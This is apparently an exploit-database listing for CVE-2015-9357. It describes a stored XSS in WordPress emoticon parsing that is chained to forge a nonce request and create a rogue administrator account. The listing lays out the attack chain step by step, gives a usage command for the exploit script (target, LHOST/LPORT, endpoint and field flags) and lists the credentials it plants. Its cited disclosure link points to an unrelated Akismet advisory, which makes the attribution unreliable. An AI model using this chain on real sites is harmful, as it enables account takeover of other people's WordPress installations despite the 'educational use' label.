Share
## https://sploitus.com/exploit?id=AFA9B134-5F05-5222-9883-9FF99C6BDF35
# CVE-2015-9357

wordpress smiley/emoticon parser stored xss, admin user creation via forged nonce request.

breaks out of `` attribute context through the emoticon regex, lands js in an `onerror` handler. no script tag needed, survives wp_kses filtering on the affected field.

chain: submit payload to any field that gets smiley-converted, admin views it, xss fires in their session, pulls create-user nonce from user-new.php, posts new administrator account, confirm via login.

lab/educational use only. requires the target field to actually apply wordpress smiley conversion, varies by theme/plugin.

original vuln disclosure: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html

## usage

```
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
  --endpoint https://target/wp-admin/admin-ajax.php \
  --field message --action  --nonce  \
  --data "name=a,email=a@a.com,phone=a"
```

`--endpoint` / `--field` depend on where the vulnerable input actually lives (comments, contact form, etc), find it manually first.

output on success: admin creds (`pwned` / `Password123!`) and wp-admin url.

## by saretawa